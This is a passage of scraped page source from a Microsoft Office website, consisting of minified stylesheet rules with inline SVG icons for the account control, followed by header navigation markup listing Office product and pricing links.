stroke-width='1.5'/%3E%3Cg transform='matrix(.9 0 0 .9 10.431 10.431)' stroke-width='2'%3E%3Ccircle cx='24.25' cy='18' r='9'/%3E%3Cpath d='M11.2 40a1 1 0 1126.1 0'/%3E%3C/g%3E%3C/g%3E%3C/svg%3E")}.glyph_msft{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='108' height='23'%3E%3Cpath d='M44.836 4.6v13.8h-2.4V7.583H42.4L38.119 18.4h-1.588L32.142 7.583h-.028V18.4H29.9V4.6h3.436L37.3 14.83h.057L41.545 4.6zm2 1.049a1.268 1.268 0 01.419-.967 1.411 1.411 0 011-.39 1.392 1.392 0 011.02.4 1.3 1.3 0 01.405.957 1.249 1.249 0 01-.414.953 1.428 1.428 0 01-1.011.385A1.4 1.4 0 0147.25 6.6a1.263 1.263 0 01-.41-.949M49.41 18.4h-2.329V8.507h2.329zm7.064-1.694a3.225 3.225 0 001.145-.24 4.808 4.808 0 001.155-.636V18a4.659 4.659 0 01-1.266.481 6.9 6.9 0 01-1.554.163 4.707 4.707 0 01-4.918-4.907 5.644 5.644 0 011.4-3.932 5.054 5.054 0 013.955-1.545 5.42 5.42 0 011.324.169 4.4 4.4 0 011.063.39v2.232a4.73 4.73 0 00-1.1-.611 3.187 3.187 0 00-1.15-.217 2.918 2.918 0 00-2.223.9 3.366 3.366 0 00-.847 2.415 3.217 3.217 0 00.813 2.339 2.938 2.938 0 002.209.837m8.931-8.363a2.892 2.892 0 01.5.039 2.025 2.025 0 01.376.1v2.357a2.075 2.075 0 00-.535-.255 2.649 2.649 0 00-.851-.12 1.811 1.811 0 00-1.449.722 3.47 3.47 0 00-.592 2.223V18.4h-2.335V8.507h2.329v1.559h.039a2.731 2.731 0 01.962-1.266 2.615 2.615 0 011.55-.457m1 5.254a5.355 5.355 0 011.387-3.887 5.1 5.1 0 013.85-1.434 4.741 4.741 0 013.623 1.381 5.208 5.208 0 011.3 3.729 5.259 5.259 0 01-1.385 3.83 5.02 5.02 0 01-3.773 1.424 4.931 4.931 0 01-3.652-1.352 4.984 4.984 0 01-1.349-3.688m2.426-.076a3.53 3.53 0 00.7 2.367 2.5 2.5 0 002.011.818 2.344 2.344 0 001.934-.818 3.78 3.78 0 00.664-2.425 3.649 3.649 0 00-.688-2.411 2.39 2.39 0 00-1.929-.813 2.441 2.441 0 00-1.988.852 3.707 3.707 0 00-.707 2.43m11.2-2.416a1 1 0 00.317.785 5.431 5.431 0 001.405.716 4.768 4.768 0 011.959 1.256 2.608 2.608 0 01.563 1.689 2.718 2.718 0 01-1.073 2.243 4.565 4.565 0 01-2.9.846 6.962 6.962 0 01-1.362-.149 6.036 6.036 0 01-1.265-.38v-2.29a5.74 5.74 0 001.367.7 4.009 4.009 0 001.328.26 2.37 2.37 0 001.164-.221.792.792 0 00.375-.741 1.027 1.027 0 00-.389-.813 5.772 5.772 0 00-1.478-.766 4.56 4.56 0 01-1.828-1.212 2.657 2.657 0 01-.539-1.713 2.706 2.706 0 011.063-2.2 4.245 4.245 0 012.764-.862 6.669 6.669 0 011.164.116 5.131 5.131 0 011.078.3v2.214a4.943 4.943 0 00-1.078-.53 3.61 3.61 0 00-1.222-.221 1.776 1.776 0 00-1.035.26.822.822 0 00-.37.712m5.241 2.493a5.355 5.355 0 011.386-3.89 5.1 5.1 0 013.85-1.434 4.741 4.741 0 013.623 1.381 5.208 5.208 0 011.3 3.729 5.259 5.259 0 01-1.385 3.83 5.02 5.02 0 01-3.773 1.424 4.931 4.931 0 01-3.652-1.352 4.984 4.984 0 01-1.349-3.688m2.426-.076a3.535 3.535 0 00.7 2.367 2.506 2.506 0 002.012.818 2.344 2.344 0 001.934-.818 3.78 3.78 0 00.664-2.425 3.649 3.649 0 00-.688-2.411 2.391 2.391 0 00-1.93-.813 2.44 2.44 0 00-1.987.852 3.707 3.707 0 00-.707 2.43m15.464-3.109H99.7V18.4h-2.359v-7.988h-1.655V8.507h1.655V7.13a3.425 3.425 0 011.016-2.555 3.56 3.56 0 012.6-1 5.949 5.949 0 01.751.043 3.025 3.025 0 01.577.13v2.016a2.381 2.381 0 00-.4-.164 2.106 2.106 0 00-.664-.1 1.405 1.405 0 00-1.126.457 2.015 2.015 0 00-.395 1.356v1.194h3.469V6.283l2.338-.712v2.936h2.358v1.905h-2.358v4.629a1.954 1.954 0 00.332 1.29 1.329 1.329 0 001.045.375 1.569 1.569 0 00.486-.1 2.271 2.271 0 00.5-.231V18.3a2.765 2.765 0 01-.736.231 5.072 5.072 0 01-1.015.105 2.889 2.889 0 01-2.209-.784 3.341 3.341 0 01-.736-2.363z' fill='%23737373'/%3E%3Cpath fill='%23f25022' d='M0 0h10.931v10.931H0z'/%3E%3Cpath fill='%237fba00' d='M12.069 0H23v10.931H12.069z'/%3E%3Cpath fill='%2300a4ef' d='M0 12.069h10.931V23H0z'/%3E%3Cpath fill='%23ffb900' d='M12.069 12.069H23V23H12.069z'/%3E%3C/svg%3E")}.glyph_more{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 48 48' fill='%23707070'%3E%3Cg class='mectrl_fill'%3E%3Ccircle r='2' cx='12' cy='24'/%3E%3Ccircle r='2' cx='24' cy='24'/%3E%3Ccircle r='2' cx='36' cy='24'/%3E%3C/g%3E%3C/svg%3E")}.glyph_chevron{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='16' height='10' viewBox='0 3 16 10' fill='%23231F20'%3E%3Cg class='mectrl_fill'%3E%3Cpath d='M15.284 3.642l.716.716-8 8-8-8 .716-.716L8 10.926z'/%3E%3C/g%3E%3C/svg%3E")}}.mectrl_profilepic{position:relative;width:100%;height:100%;border-radius:50%;overflow:hidden;background-size:cover;background-position:center center;background-repeat:no-repeat}.mectrl_profilepic_initials{border:1px solid #777;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}#mectrl_currentAccount_picture .mectrl_profilepic_initials{font-size:32px}.mectrl_profilepic_initials.mectrl_initials{position:absolute;top:1px;bottom:1px;left:1px;right:1px;border-radius:50%}.c-uhfh>.theme-dark .c-me .mectrl_profilepic_initials,.mectrl_theme_azure_hcdark .mectrl_profilepic_initials,.mectrl_theme_dark .mectrl_profilepic_initials,.mectrl_theme_gray .mectrl_profilepic_initials,.mectrl_theme_off_black .mectrl_profilepic_initials{border:1px solid #fff;color:#fff}@media screen and (-ms-high-contrast:white-on-black){.mectrl_hc_aad{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' fill='%23fff' stroke='%23fff'%3E%3Ccircle class='mectrl_stroke' cx='32' cy='32' r='30.25' stroke-width='1.5' fill='none'/%3E%3Cg class='mectrl_stroke' fill='none' stroke-width='2.5' transform='matrix(.9 0 0 .9 10.4 10.4)'%3E%3Crect x='13.3' y='12.3' width='21.4' height='28.5' rx='.6' ry='.6'/%3E%3Ccircle cy='25.4' cx='24' r='3.6'/%3E%3Cpath d='M18 35a1 1 0 1112 0'/%3E%3C/g%3E%3Cg class='mectrl_fill' stroke='none'%3E%3Cpath d='M36.68 14h2.34l-3.24 6.75h-2.43zM24.89 14h2.43l5.58 11.25a1.046 1.046 0 01-1.791 1.08l-.549-1.08z'/%3E%3C/g%3E%3C/svg%3E")!important}.mectrl_hc_msa{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' fill='%23fff' stroke='%23fff'%3E%3Cg class='mectrl_stroke' fill='none'%3E%3Ccircle cx='32' cy='32' r='30.25' stroke-width='1.5'/%3E%3Cg transform='matrix(.9 0 0 .9 10.431 10.431)' stroke-width='2'%3E%3Ccircle cx='24.25' cy='18' r='9'/%3E%3Cpath d='M11.2 40a1 1 0 1126.1 0'/%3E%3C/g%3E%3C/g%3E%3C/svg%3E")!important}}@media screen and (-ms-high-contrast:black-on-white){.mectrl_hc_aad{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' fill='%23707070' stroke='%23707070'%3E%3Ccircle class='mectrl_stroke' cx='32' cy='32' r='30.25' stroke-width='1.5' fill='none'/%3E%3Cg class='mectrl_stroke' fill='none' stroke-width='2.5' transform='matrix(.9 0 0 .9 10.4 10.4)'%3E%3Crect x='13.3' y='12.3' width='21.4' height='28.5' rx='.6' ry='.6'/%3E%3Ccircle cy='25.4' cx='24' r='3.6'/%3E%3Cpath d='M18 35a1 1 0 1112 0'/%3E%3C/g%3E%3Cg class='mectrl_fill' stroke='none'%3E%3Cpath d='M36.68 14h2.34l-3.24 6.75h-2.43zM24.89 14h2.43l5.58 11.25a1.046 1.046 0 01-1.791 1.08l-.549-1.08z'/%3E%3C/g%3E%3C/svg%3E")!important}.mectrl_hc_msa{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' fill='%23707070' stroke='%23707070'%3E%3Cg class='mectrl_stroke' fill='none'%3E%3Ccircle cx='32' cy='32' r='30.25' stroke-width='1.5'/%3E%3Cg transform='matrix(.9 0 0 .9 10.431 10.431)' stroke-width='2'%3E%3Ccircle cx='24.25' cy='18' r='9'/%3E%3Cpath d='M11.2 40a1 1 0 1126.1 0'/%3E%3C/g%3E%3C/g%3E%3C/svg%3E")!important}}.mectrl_profilepic_button{position:relative}.mectrl_profilepic_button:hover::before{z-index:1;content:"";position:absolute;display:block;width:100%;height:100%;border-radius:50%;overflow:hidden;background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 300 300' fill='%23fff' stroke='%23fff'%3E%3Ccircle cx='72.8' cy='106.3' r='7' stroke='none'/%3E%3Cg class='mectrl_stroke' fill='none'%3E%3Ccircle cx='150' cy='155' r='49' stroke-width='15'/%3E%3Cpath d='M45 79v153h210V79h-55l-15-15h-70l-15 15z' stroke-width='14'/%3E%3C/g%3E%3C/svg%3E");background-size:32px 32px;background-position:center center;background-repeat:no-repeat}@media screen and (-ms-high-contrast:black-on-white){.mectrl_profilepic_button:hover::before{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 300 300' stroke='%23000'%3E%3Ccircle cx='72.8' cy='106.3' r='7' stroke='none'/%3E%3Cg class='mectrl_stroke' fill='none'%3E%3Ccircle cx='150' cy='155' r='49' stroke-width='15'/%3E%3Cpath d='M45 79v153h210V79h-55l-15-15h-70l-15 15z' stroke-width='14'/%3E%3C/g%3E%3C/svg%3E")}}@media screen and (-ms-high-contrast:white-on-black){.mectrl_profilepic_button:hover::before{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 300 300' fill='%230ff' stroke='%230ff'%3E%3Ccircle cx='72.8' cy='106.3' r='7' stroke='none'/%3E%3Cg class='mectrl_stroke' fill='none'%3E%3Ccircle cx='150' cy='155' r='49' stroke-width='15'/%3E%3Cpath d='M45 79v153h210V79h-55l-15-15h-70l-15 15z' stroke-width='14'/%3E%3C/g%3E%3C/svg%3E")}}.mectrl_focus_visible .mectrl_profilepic_button:focus::before{z-index:1;content:"";position:absolute;display:block;width:100%;height:100%;border-radius:50%;overflow:hidden;background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 300 300' fill='%23fff' stroke='%23fff'%3E%3Ccircle cx='72.8' cy='106.3' r='7' stroke='none'/%3E%3Cg class='mectrl_stroke' fill='none'%3E%3Ccircle cx='150' cy='155' r='49' stroke-width='15'/%3E%3Cpath d='M45 79v153h210V79h-55l-15-15h-70l-15 15z' stroke-width='14'/%3E%3C/g%3E%3C/svg%3E");background-size:32px 32px;background-position:center center;background-repeat:no-repeat}@media screen and (-ms-high-contrast:black-on-white){.mectrl_focus_visible .mectrl_profilepic_button:focus::before{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 300 300' stroke='%23000'%3E%3Ccircle cx='72.8' cy='106.3' r='7' stroke='none'/%3E%3Cg class='mectrl_stroke' fill='none'%3E%3Ccircle cx='150' cy='155' r='49' stroke-width='15'/%3E%3Cpath d='M45 79v153h210V79h-55l-15-15h-70l-15 15z' stroke-width='14'/%3E%3C/g%3E%3C/svg%3E")}}@media screen and (-ms-high-contrast:white-on-black){.mectrl_focus_visible .mectrl_profilepic_button:focus::before{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 300 300' fill='%230ff' stroke='%230ff'%3E%3Ccircle cx='72.8' cy='106.3' r='7' stroke='none'/%3E%3Cg class='mectrl_stroke' fill='none'%3E%3Ccircle cx='150' cy='155' r='49' stroke-width='15'/%3E%3Cpath d='M45 79v153h210V79h-55l-15-15h-70l-15 15z' stroke-width='14'/%3E%3C/g%3E%3C/svg%3E")}}.mectrl_profilepic_button:focus::before,.mectrl_profilepic_button:hover::before{background-color:rgba(0,0,0,.5)}@media screen and (-ms-high-contrast:black-on-white){.mectrl_profilepic_button:focus::before,.mectrl_profilepic_button:hover::before{background-color:rgba(255,255,255,.5)}}@media screen and (-ms-high-contrast:white-on-black){.mectrl_profilepic_button:focus::before,.mectrl_profilepic_button:hover::before{background-color:rgba(255,255,255,.5)}}.mectrl_theme_azure_hclight .mectrl_profilepic_button{-webkit-box-shadow:inset 0 0 0 1px;box-shadow:inset 0 0 0 1px}.mectrl_theme_azure_hclight .mectrl_profilepic_button:focus::before,.mectrl_theme_azure_hclight .mectrl_profilepic_button:hover::before{-webkit-box-shadow:inset 0 0 0 1px;box-shadow:inset 0 0 0 1px;-ms-high-contrast-adjust:none;color:#fff!important;border-color:#fff!important;outline-color:#fff!important;fill:#fff!important;background-color:purple}.mectrl_theme_azure_hcdark .mectrl_profilepic_button{-webkit-box-shadow:inset 0 0 0 1px;box-shadow:inset 0 0 0 1px}.mectrl_theme_azure_hcdark .mectrl_profilepic_button:focus::before,.mectrl_theme_azure_hcdark .mectrl_profilepic_button:hover::before{-webkit-box-shadow:inset 0 0 0 1px;box-shadow:inset 0 0 0 1px;-ms-high-contrast-adjust:none;color:#000!important;border-color:#000!important;outline-color:#000!important;fill:#000!important;background-color:#0ff}.mectrl_header{display:-webkit-box;display:-ms-flexbox;display:flex;cursor:pointer;font-size:13px;border:1px solid transparent;border-bottom-style:none;width:100%;height:48px}.mectrl_header .mectrl_profilepic{width:32px;height:32px;margin:8px}.mectrl_header .mectrl_profilepic.mectrl_fallback{margin:0}.mectrl_header .mectrl_headertext{max-width:160px;line-height:48px;vertical-align:top;font-family:"Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:13px;padding-left:12px;padding-right:4px}.mectrl_header .mectrl_headertext.noIcon{padding-right:12px}@media screen and (-ms-high-contrast:active){.mectrl_header{border-bottom:1px solid}}.mectrl_header{color:#333}.c-uhfh>.theme-dark .c-me .mectrl_header,.mectrl_theme_dark .mectrl_header{color:#fff}.c-uhfh>.theme-dark .c-me .mectrl_headertext,.mectrl_theme_dark .mectrl_headertext{color:#fff}.mectrl_theme_azure_hclight .mectrl_header{color:#000}.mectrl_theme_azure_hcdark .mectrl_header{color:#fff}.mectrl_theme_gray .mectrl_header{color:#fff}.mectrl_theme_off_black .mectrl_header{color:#fff}.mectrl_screen_reader_text{display:inline-block;position:absolute;width:1px;height:1px;overflow:hidden}span[id^=mectrl_tooltip].mectrl_tooltip{display:block;visibility:hidden;position:fixed;z-index:1300000;max-width:260px;padding:4px;font-family:"Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:12px;line-height:normal;text-align:center;word-break:break-all;overflow-wrap:break-word;border:1px solid #ccc;color:#333;background-color:#fff;-webkit-box-shadow:2px 2px 2px #777;box-shadow:2px 2px 2px #777;pointer-events:none}.mectrl_truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.mectrl_root,.mectrl_root div{font-family:"Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;line-height:normal}.mectrl_root *,.mectrl_root div *{-webkit-box-sizing:border-box;box-sizing:border-box}.mectrl_mainDropdown>.mectrl_dropdownbody{width:320px;-webkit-box-shadow:0 24px 54px rgba(0,0,0,.15),0 4.5px 13.5px rgba(0,0,0,.08);box-shadow:0 24px 54px rgba(0,0,0,.15),0 4.5px 13.5px rgba(0,0,0,.08)}@media screen and (-ms-high-contrast:active){.mectrl_mainDropdown>.mectrl_dropdownbody{border:1px solid}}a.mectrl_trigger{display:inline-block}</style>
    
</head>
<body style="display: block;" data-gr-c-s-loaded="true" cz-shortcut-listen="true">
    
    

    
    <div class="home" style="overflow-x:visible;overflow-y:visible;">
        <div class="home__container">
            
    <div class="home__header-footer home__header">
        



    <div id="pmg-global-header" class="log-appear">
            <div id="headerArea" class="uhf" data-m="{&quot;cN&quot;:&quot;headerArea&quot;,&quot;cT&quot;:&quot;Area_coreuiArea&quot;,&quot;id&quot;:&quot;a1Body&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;Body&quot;}">
                <div id="headerRegion" data-region-key="headerregion" data-m="{&quot;cN&quot;:&quot;headerRegion&quot;,&quot;cT&quot;:&quot;Region_coreui-region&quot;,&quot;id&quot;:&quot;r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;a1&quot;}">

    <div id="headerUniversalHeader" data-m="{&quot;cN&quot;:&quot;headerUniversalHeader&quot;,&quot;cT&quot;:&quot;Module_coreui-universalheader&quot;,&quot;id&quot;:&quot;m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;r1a1&quot;}" data-module-id="Category|headerRegion|coreui-region|headerUniversalHeader|coreui-universalheader">
        





        <a id="uhfSkipToMain" class="m-skip-to-main" href="#main" tabindex="0" data-m="{&quot;cN&quot;:&quot;Skip to content_nonnav&quot;,&quot;id&quot;:&quot;nn1m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;m1r1a1&quot;}">Skip to main content</a>


<header class="c-uhfh context-uhf c-sgl-stck c-category-header" itemscope="itemscope" data-header-footprint="/office/officeheader, fromService: True" data-magict="true" itemtype="http://schema.org/Organization">
    <div class="theme-light js-global-head f-closed  global-head-cont" data-m="{&quot;cN&quot;:&quot;Universal Header_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;m1r1a1&quot;}">
        <div class="c-uhfh-gcontainer-st">
            <button type="button" class="c-action-trigger c-glyph glyph-global-nav-button" aria-label="All Microsoft expand to see list of Microsoft products and services" initialstate-label="All Microsoft expand to see list of Microsoft products and services" togglestate-label="Close All Microsoft list" aria-expanded="false" data-m="{&quot;cN&quot;:&quot;Mobile menu button_nonnav&quot;,&quot;id&quot;:&quot;nn1c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2m1r1a1&quot;}"></button>
            <button type="button" class="c-action-trigger c-glyph glyph-arrow-htmllegacy" aria-expanded="false" data-m="{&quot;cN&quot;:&quot;Close Search_nonnav&quot;,&quot;id&quot;:&quot;nn2c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c2m1r1a1&quot;}"></button>
                    <a id="uhfLogo" class="c-logo c-sgl-stk-uhfLogo" itemprop="url" href="https://www.microsoft.com" aria-label="Microsoft" data-m="{&quot;cN&quot;:&quot;GlobalNav_Logo_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c2m1r1a1&quot;}">
                        <img alt="" itemprop="logo" itemscope="itemscope" class="c-image" src="https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31" role="presentation" aria-hidden="true">
                        <span role="presentation" aria-hidden="true">Microsoft</span>
                    </a>
            <div class="f-mobile-title">
                <button type="button" class="c-action-trigger c-glyph glyph-chevron-left" aria-label="See more menu options" data-m="{&quot;cN&quot;:&quot;Mobile back button_nonnav&quot;,&quot;id&quot;:&quot;nn4c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c2m1r1a1&quot;}"></button>
                <span data-global-title="Microsoft home" class="js-mobile-title">Office</span>
                <button type="button" class="c-action-trigger c-glyph glyph-chevron-right" aria-label="See more menu options" data-m="{&quot;cN&quot;:&quot;Mobile forward button_nonnav&quot;,&quot;id&quot;:&quot;nn5c2m1r1a1&quot;,&quot;sN&quot;:5,&quot;aN&quot;:&quot;c2m1r1a1&quot;}"></button>
            </div>
                    <div class="c-show-pipe x-hidden-vp-mobile-st">
                        <a id="uhfCatLogo" class="c-logo c-cat-logo" href="https://www.office.com/" aria-label="Office" itemprop="url" data-m="{&quot;cN&quot;:&quot;CatNav_Office_nav&quot;,&quot;id&quot;:&quot;n6c2m1r1a1&quot;,&quot;sN&quot;:6,&quot;aN&quot;:&quot;c2m1r1a1&quot;}">
                                <span>Office</span>
                        </a>
                    </div>
                <div class="cat-logo-button-cont x-hidden">
                        <button type="button" id="uhfCatLogoButton" class="c-cat-logo-button x-hidden" aria-expanded="false" aria-label="Office" data-m="{&quot;cN&quot;:&quot;Office_nonnav&quot;,&quot;id&quot;:&quot;nn7c2m1r1a1&quot;,&quot;sN&quot;:7,&quot;aN&quot;:&quot;c2m1r1a1&quot;}">
                            Office
                        </button>
                </div>



                    <nav id="uhf-g-nav" aria-label="Contextual menu" class="c-uhfh-gnav" data-m="{&quot;cN&quot;:&quot;Category nav_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c8c2m1r1a1&quot;,&quot;sN&quot;:8,&quot;aN&quot;:&quot;c2m1r1a1&quot;}">
            <ul class="js-paddle-items">
                    <li class="single-link js-nav-menu x-hidden-none-mobile-vp uhf-menu-item">
                        <a class="c-uhf-nav-link" href="https://www.office.com/" data-m="{&quot;cN&quot;:&quot;CatNav_Home_nav&quot;,&quot;id&quot;:&quot;n1c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c8c2m1r1a1&quot;}"> Home </a>
                    </li>
                                        <li class="nested-menu uhf-menu-item">
                            <div class="c-uhf-menu js-nav-menu">
                                <button type="button" id="Products" aria-expanded="false" data-m="{&quot;cN&quot;:&quot;CatNav_Products_nonnav&quot;,&quot;id&quot;:&quot;nn2c8c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c8c2m1r1a1&quot;}">Products</button>

                                <ul class="f-multi-column f-multi-column-4" data-class-idn="f-multi-column f-multi-column-4" aria-hidden="true" data-m="{&quot;cN&quot;:&quot;Products_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c8c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c8c2m1r1a1&quot;}">
        <li class="f-sub-menu js-nav-menu nested-menu" data-m="{&quot;cN&quot;:&quot;ForHome_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c1c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c8c2m1r1a1&quot;}">

            <button type="button" f-multi-parent="true" aria-expanded="false" data-m="{&quot;cN&quot;:&quot;CatNav_ForHome_nonnav&quot;,&quot;id&quot;:&quot;nn1c1c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c1c3c8c2m1r1a1&quot;}">For home &gt;</button>
            <ul aria-hidden="true">
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;HomePlansPricing_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c1c3c8c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c1c3c8c2m1r1a1&quot;}">
            <a id="HomePlansPricing" class="js-subm-uhf-nav-link" href="https://products.office.com/compare-all-microsoft-office-products?tab=1" data-m="{&quot;cN&quot;:&quot;CatNav_HomePlansPricing_nav&quot;,&quot;id&quot;:&quot;n1c2c1c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c1c3c8c2m1r1a1&quot;}">Plans &amp; pricing</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;for-households_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c1c3c8c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c1c3c8c2m1r1a1&quot;}">
            <a id="for-households" class="js-subm-uhf-nav-link" href="https://products.office.com/office-365-home" data-m="{&quot;cN&quot;:&quot;CatNav_for-households_nav&quot;,&quot;id&quot;:&quot;n1c3c1c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c1c3c8c2m1r1a1&quot;}">For households</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;for-individuals_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c4c1c3c8c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c1c3c8c2m1r1a1&quot;}">
            <a id="for-individuals" class="js-subm-uhf-nav-link" href="https://products.office.com/office-365-personal" data-m="{&quot;cN&quot;:&quot;CatNav_for-individuals_nav&quot;,&quot;id&quot;:&quot;n1c4c1c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c4c1c3c8c2m1r1a1&quot;}">For individuals</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;office-online_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c5c1c3c8c2m1r1a1&quot;,&quot;sN&quot;:5,&quot;aN&quot;:&quot;c1c3c8c2m1r1a1&quot;}">
            <a id="office-online" class="js-subm-uhf-nav-link" href="https://products.office.com/office-online/documents-spreadsheets-presentations-office-online" data-m="{&quot;cN&quot;:&quot;CatNav_office-online_nav&quot;,&quot;id&quot;:&quot;n1c5c1c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c5c1c3c8c2m1r1a1&quot;}">Office Online</a>
            
        </li>
            </ul>
            
        </li>
        <li class="f-sub-menu js-nav-menu nested-menu" data-m="{&quot;cN&quot;:&quot;ForBusiness_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c3c8c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c3c8c2m1r1a1&quot;}">

            <button type="button" f-multi-parent="true" aria-expanded="false" data-m="{&quot;cN&quot;:&quot;CatNav_ForBusiness_nonnav&quot;,&quot;id&quot;:&quot;nn1c2c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c3c8c2m1r1a1&quot;}">For business &gt;</button>
            <ul aria-hidden="true">
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;PlansPricing_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c2c2c3c8c2m1r1a1&quot;,&quot;sN&quot;:2,&quot;aN&quot;:&quot;c2c3c8c2m1r1a1&quot;}">
            <a id="PlansPricing" class="js-subm-uhf-nav-link" href="https://products.office.com/compare-all-microsoft-office-products?tab=2" data-m="{&quot;cN&quot;:&quot;CatNav_PlansPricing_nav&quot;,&quot;id&quot;:&quot;n1c2c2c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c2c2c3c8c2m1r1a1&quot;}">Plans &amp; pricing</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Smallbusiness_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c3c2c3c8c2m1r1a1&quot;,&quot;sN&quot;:3,&quot;aN&quot;:&quot;c2c3c8c2m1r1a1&quot;}">
            <a id="SmallBusiness" class="js-subm-uhf-nav-link" href="https://products.office.com/business/explore-office-365-for-business" data-m="{&quot;cN&quot;:&quot;CatNav_Smallbusiness_nav&quot;,&quot;id&quot;:&quot;n1c3c2c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c3c2c3c8c2m1r1a1&quot;}">Small business</a>
            
        </li>
        <li class="js-nav-menu single-link" data-m="{&quot;cN&quot;:&quot;Enterprise_cont&quot;,&quot;cT&quot;:&quot;Container&quot;,&quot;id&quot;:&quot;c4c2c3c8c2m1r1a1&quot;,&quot;sN&quot;:4,&quot;aN&quot;:&quot;c2c3c8c2m1r1a1&quot;}">
            <a id="Enterprise" class="js-subm-uhf-nav-link" href="https://products.office.com/business/enterprise-productivity-tools" data-m="{&quot;cN&quot;:&quot;CatNav_Enterprise_nav&quot;,&quot;id&quot;:&quot;n1c4c2c3c8c2m1r1a1&quot;,&quot;sN&quot;:1,&quot;aN&quot;:&quot;c4c2c3c8c2m1r1a1&quot;}">Enterprise</a>
            
        </li>
